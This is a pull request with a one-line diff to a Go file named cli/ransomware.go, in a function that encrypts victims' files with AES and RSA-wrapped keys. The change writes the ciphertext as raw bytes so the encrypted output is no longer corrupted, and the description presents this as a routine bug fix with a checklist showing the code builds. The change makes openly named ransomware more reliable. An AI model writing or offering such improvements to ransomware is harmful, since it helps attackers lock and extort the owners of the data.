### PR TITLE
fix(cli): use WriteToFile for binary ciphertext output

### DIFF
--- a/cli/ransomware.go
+++ b/cli/ransomware.go
@@ -283,7 +283,7 @@ func encryptFile(path string, aesKey crypto.AesKey, encryptedAesKey []byte, encS
 
 	fileContent := append(encryptedAesKey, cipherText...)
 
-	return fs.WriteStringToFile(newFilePath, string(fileContent))
+	return fs.WriteToFile(newFilePath, fileContent)
 }
 
 func decryptFile(path string, rsaPrivateKey *rsa.PrivateKey, encSuffix string) error {


### PR DESCRIPTION
## Summary

- Replace `WriteStringToFile(path, string(fileContent))` with `WriteToFile(path, fileContent)` in `encryptFile` to avoid corrupting binary ciphertext through string conversion

## Details

`encryptFile` concatenates the encrypted AES key with the AES-encrypted ciphertext into a `[]byte` slice. Previously, this binary data was passed through `string()` conversion before writing via `WriteStringToFile`, which can silently corrupt non-UTF-8 byte sequences. This fix uses `WriteToFile` directly, preserving the raw binary data as-is.

Fixes #14

## Test plan

- [x] Project builds successfully (`go build ./...`)
- [x] `go vet` passes with no new issues
- [x] `gofmt -s` produces no changes
- [x] No pre-existing tests affected (project has no test files)